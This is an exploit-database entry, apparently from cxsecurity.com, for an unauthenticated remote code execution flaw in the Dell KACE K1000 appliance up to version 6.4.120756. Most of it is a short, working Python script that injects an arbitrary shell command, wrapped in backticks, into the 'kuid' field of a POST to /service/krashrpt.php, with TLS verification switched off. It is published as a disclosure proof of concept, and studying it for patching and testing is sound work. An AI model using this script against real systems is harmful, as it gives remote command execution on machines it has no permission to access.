Dell KACE Systems Management Appliance (K1000) 6.4.120756 Code Execution

2019.04.12
Credit: Julien Ahrens
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python
# Exploit Title: Dell KACE Systems Management Appliance (K1000) <= 6.4.120756 Unauthenticated RCE
# Version: <= 6.4.120756
# Date: 2019-04-09
# Author: Julien Ahrens (@MrTuxracer)
# Software Link: https://www.quest.com/products/kace-systems-management-appliance/
# Write-up: https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/
# Note: The software is maintained by Quest now, but the vulnerability was fixed while Quest was part of Dell.
#
# Usage: python3 exploit.py https://localhost 'sleep 10'

import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

target_url = sys.argv[1]
payload = sys.argv[2]

r = requests.post(target_url + '/service/krashrpt.php', data={
    'kuid' : '`' + payload + '`'
    }, verify=False)

print('Response: %s %s\nKACE Version: %s\nResponse time: %ss' % (r.status_code, r.reason, r.headers['X-DellKACE-Version'], r.elapsed.total_seconds()))


Copyright 2019, cxsecurity.com